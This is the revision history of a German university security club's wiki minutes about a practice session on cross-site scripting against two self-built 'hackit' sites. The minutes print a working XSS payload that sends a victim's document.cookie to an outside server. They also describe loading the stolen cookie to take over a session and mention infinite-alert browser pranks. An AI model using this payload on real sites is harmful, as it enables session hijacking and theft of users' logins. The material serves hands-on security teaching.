https://www2.informatik.uni-hamburg.de/fachschaft/wiki/index.php?title=CInsects/Protokolle/CInsects:Treffen-2011-01-11&feed=atom&action=history
CInsects/Protokolle/CInsects:Treffen-2011-01-11 - Versionsgeschichte
2024-03-29T08:01:36Z
Versionsgeschichte dieser Seite in Fachschaft_Informatik
MediaWiki 1.38.0
https://www2.informatik.uni-hamburg.de/fachschaft/wiki/index.php?title=CInsects/Protokolle/CInsects:Treffen-2011-01-11&diff=11875&oldid=prev
0funke am 12. Januar 2011 um 14:10 Uhr
2011-01-12T14:10:17Z
<p></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="de">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Nächstältere Version</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Version vom 12. Januar 2011, 15:10 Uhr</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l14">Zeile 14:</td>
<td colspan="2" class="diff-lineno">Zeile 14:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Natürlich war auch viel nasty shit möglich, wie aufpoppende Meldungen in einer while Schleife mit 1=1 als Bedingung, sodass der Brwoser neu gestartet werden musste.</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Natürlich war auch viel nasty shit möglich, wie aufpoppende Meldungen in einer while Schleife mit 1=1 als Bedingung, sodass der Brwoser neu gestartet werden musste.</div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;"></ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">Hackits [http://mercarion-online.de/test/CInsects/] Achtung! bitte keine Scripts verwenden, die Brwoser andere Nutzer unbrauchbar machen (s.o. unter nasty shit). Wenn eine solcher Hack drinn ist, könnt ihr (0rokita) bescheidsagen, er löscht die dann.</ins></div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Statistik ==</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Statistik ==</div></td></tr>
<tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l21">Zeile 21:</td>
<td colspan="2" class="diff-lineno">Zeile 23:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>L33tness-Faktor der Kekse: 100%</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>L33tness-Faktor der Kekse: 100%</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;">== Hackits ==</del></div></td><td colspan="2" class="diff-side-added"></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;"></del></div></td><td colspan="2" class="diff-side-added"></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;">Hackit [http://mercarion-online.de/test/CInsects/] Achtung! es ist dort möglich andere Browser unbenutzbar zu machen, wenn eine solcher hack drinn ist, könnt ihr mir (0rokita) bescheidsagen, ich lösche die dann, Oder noch besser: Bitte keine Endlosschleifen!</del></div></td><td colspan="2" class="diff-side-added"></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Themen für das nächste mal ==</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Themen für das nächste mal ==</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>FIXME</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>FIXME und daran zu denken, jemanden zu bestimmen, der Kekse mitbringt.</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>und daran zu denken, jemanden zu bestimmen, der Kekse mitbringt.</div></td><td colspan="2" class="diff-side-added"></td></tr>
</table>
0funke
https://www2.informatik.uni-hamburg.de/fachschaft/wiki/index.php?title=CInsects/Protokolle/CInsects:Treffen-2011-01-11&diff=11865&oldid=prev
0rokita: Link zum hackit
2011-01-12T09:32:57Z
<p>Link zum hackit</p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="de">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Nächstältere Version</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Version vom 12. Januar 2011, 10:32 Uhr</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l20">Zeile 20:</td>
<td colspan="2" class="diff-lineno">Zeile 20:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>L33tness-Faktor der Kekse: 100%</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>L33tness-Faktor der Kekse: 100%</div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;"></ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">== Hackits ==</ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;"></ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">Hackit [http://mercarion-online.de/test/CInsects/] Achtung! es ist dort möglich andere Browser unbenutzbar zu machen, wenn eine solcher hack drinn ist, könnt ihr mir (0rokita) bescheidsagen, ich lösche die dann, Oder noch besser: Bitte keine Endlosschleifen!</ins></div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Themen für das nächste mal ==</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Themen für das nächste mal ==</div></td></tr>
</table>
0rokita
https://www2.informatik.uni-hamburg.de/fachschaft/wiki/index.php?title=CInsects/Protokolle/CInsects:Treffen-2011-01-11&diff=11858&oldid=prev
0funke: /* Hackits */
2011-01-11T21:02:42Z
<p><span dir="auto"><span class="autocomment">Hackits</span></span></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="de">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Nächstältere Version</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Version vom 11. Januar 2011, 22:02 Uhr</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l11">Zeile 11:</td>
<td colspan="2" class="diff-lineno">Zeile 11:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Das zweite Hackit war ein wenig interessanter. Hier bestand die Möglichkeit sich mit Name und Kennwort anzumelden und dann über ein Nachrichten System Meldungen an andere Mitglieder zu senden. Diese Meldungen konnten natürlich JavaScript beinhalten, sodass wir damit anfangen konnten die Cookies (KEEEKSE!!! omnomnom) anderer Nutzer zu klauen.</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Das zweite Hackit war ein wenig interessanter. Hier bestand die Möglichkeit sich mit Name und Kennwort anzumelden und dann über ein Nachrichten System Meldungen an andere Mitglieder zu senden. Diese Meldungen konnten natürlich JavaScript beinhalten, sodass wir damit anfangen konnten die Cookies (KEEEKSE!!! omnomnom) anderer Nutzer zu klauen.</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> <nowiki><script>document.write('<img src="http://cinsects.de/cookie?' +document.cookie+'">');</script></nowiki></div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> <nowiki><script>document.write('<img src="http://cinsects.de/cookie?' +document.cookie+'">');</script></nowiki></div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>Mit diesem Script konnten wir den Cookie desjenigen auslesen, der die Nachricht bekommen hat und haben diesen in eine nicht existierende Datei auf einem Server für den wir Rechte haben geschickt. In der Fehlerkonsole dieses Servers wurde der <del style="font-weight: bold; text-decoration: none;">Coockie </del>nun angezeigt, und musste von uns nur noch als eigener Cookie in FF eingelesen werden. </div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>Mit diesem Script konnten wir den Cookie desjenigen auslesen, der die Nachricht bekommen hat und haben diesen in eine nicht existierende Datei auf einem Server für den wir Rechte haben geschickt. In der Fehlerkonsole dieses Servers wurde der <ins style="font-weight: bold; text-decoration: none;">Cookie </ins>nun angezeigt, und musste von uns nur noch als eigener Cookie in FF eingelesen werden. </div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Natürlich war auch viel nasty shit möglich, wie aufpoppende Meldungen in einer while Schleife mit 1=1 als Bedingung, sodass der Brwoser neu gestartet werden musste.</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Natürlich war auch viel nasty shit möglich, wie aufpoppende Meldungen in einer while Schleife mit 1=1 als Bedingung, sodass der Brwoser neu gestartet werden musste.</div></td></tr>
</table>
0funke
https://www2.informatik.uni-hamburg.de/fachschaft/wiki/index.php?title=CInsects/Protokolle/CInsects:Treffen-2011-01-11&diff=11857&oldid=prev
0funke: /* Hackits */
2011-01-11T20:59:27Z
<p><span dir="auto"><span class="autocomment">Hackits</span></span></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="de">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Nächstältere Version</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Version vom 11. Januar 2011, 21:59 Uhr</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l9">Zeile 9:</td>
<td colspan="2" class="diff-lineno">Zeile 9:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>was dazu führt, das auf der ausgebenden Seite eine Meldung mit eingegebenen Text erschien. Kaputmachen konnte man hier also noch nichts, es sei denn den eigenen Rechner.</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>was dazu führt, das auf der ausgebenden Seite eine Meldung mit eingegebenen Text erschien. Kaputmachen konnte man hier also noch nichts, es sei denn den eigenen Rechner.</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>Das zweite Hackit war ein wenig interessanter. Hier bestand die Möglichkeit sich mit Name und Kennwort anzumelden und dann über ein Nachrichten System Meldungen an andere <del style="font-weight: bold; text-decoration: none;">Mitlgieder </del>zu senden. Diese Meldungen konnten natürlich JavaScript beinhalten, sodass wir damit anfangen konnten die Cookies (KEEEKSE!!! omnomnom) anderer Nutzer zu klauen.</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>Das zweite Hackit war ein wenig interessanter. Hier bestand die Möglichkeit sich mit Name und Kennwort anzumelden und dann über ein Nachrichten System Meldungen an andere <ins style="font-weight: bold; text-decoration: none;">Mitglieder </ins>zu senden. Diese Meldungen konnten natürlich JavaScript beinhalten, sodass wir damit anfangen konnten die Cookies (KEEEKSE!!! omnomnom) anderer Nutzer zu klauen.</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> <nowiki><script>document.write('<img src="http://cinsects.de/cookie?' +document.cookie+'">');</script></nowiki></div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div> <nowiki><script>document.write('<img src="http://cinsects.de/cookie?' +document.cookie+'">');</script></nowiki></div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Mit diesem Script konnten wir den Cookie desjenigen auslesen, der die Nachricht bekommen hat und haben diesen in eine nicht existierende Datei auf einem Server für den wir Rechte haben geschickt. In der Fehlerkonsole dieses Servers wurde der Coockie nun angezeigt, und musste von uns nur noch als eigener Cookie in FF eingelesen werden. </div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Mit diesem Script konnten wir den Cookie desjenigen auslesen, der die Nachricht bekommen hat und haben diesen in eine nicht existierende Datei auf einem Server für den wir Rechte haben geschickt. In der Fehlerkonsole dieses Servers wurde der Coockie nun angezeigt, und musste von uns nur noch als eigener Cookie in FF eingelesen werden. </div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>Natürlich war auch viel nasty shit möglich, wie aufpoppende Meldungen in einer while Schleife mit 1=1 als Bedingung, sodass der Brwoser neu gestartet werden musste. </div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>Natürlich war auch viel nasty shit möglich, wie aufpoppende Meldungen in einer while Schleife mit 1=1 als Bedingung, sodass der Brwoser neu gestartet werden musste.</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Statistik ==</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Statistik ==</div></td></tr>
</table>
0funke
https://www2.informatik.uni-hamburg.de/fachschaft/wiki/index.php?title=CInsects/Protokolle/CInsects:Treffen-2011-01-11&diff=11856&oldid=prev
0funke: /* Statistik */
2011-01-11T20:58:20Z
<p><span dir="auto"><span class="autocomment">Statistik</span></span></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="de">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Nächstältere Version</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Version vom 11. Januar 2011, 21:58 Uhr</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l18">Zeile 18:</td>
<td colspan="2" class="diff-lineno">Zeile 18:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Anzahl der anwesenden Personen: Start(8) Ende(9)</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Anzahl der anwesenden Personen: Start(8) Ende(9)</div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;"></ins></div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>L33tness-Faktor der Kekse: 100%</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>L33tness-Faktor der Kekse: 100%</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
</table>
0funke
https://www2.informatik.uni-hamburg.de/fachschaft/wiki/index.php?title=CInsects/Protokolle/CInsects:Treffen-2011-01-11&diff=11855&oldid=prev
0funke: Die Seite wurde neu angelegt: Diese Seite ist eine Unterseite von CInsects. Heute haben wir uns mit XSS ([https://secure.wikimedia.org/wikipedia/de/wiki/Cross-Site_Scripting Cross-Site-Scriptin...
2011-01-11T20:57:53Z
<p>Die Seite wurde neu angelegt: Diese Seite ist eine Unterseite von <a href="/fachschaft/wiki/index.php/CInsects" title="CInsects">CInsects</a>. Heute haben wir uns mit XSS ([https://secure.wikimedia.org/wikipedia/de/wiki/Cross-Site_Scripting Cross-Site-Scriptin...</p>
<p><b>Neue Seite</b></p><div>Diese Seite ist eine Unterseite von [[CInsects]].<br />
<br />
Heute haben wir uns mit XSS ([https://secure.wikimedia.org/wikipedia/de/wiki/Cross-Site_Scripting Cross-Site-Scripting:Wikipedia]) befasst.<br />
<br />
== Hackits ==<br />
<br />
Nils hat zwei Hackits auf die Beine gestellt, das eine, recht einfach, stellte uns ein Formularfeld zur Verfügung und gab den eingegebenen Text auf einer neuen Seite aus. Hier konnte jeder JavaScript Text eingefügt werden, z.B. <br />
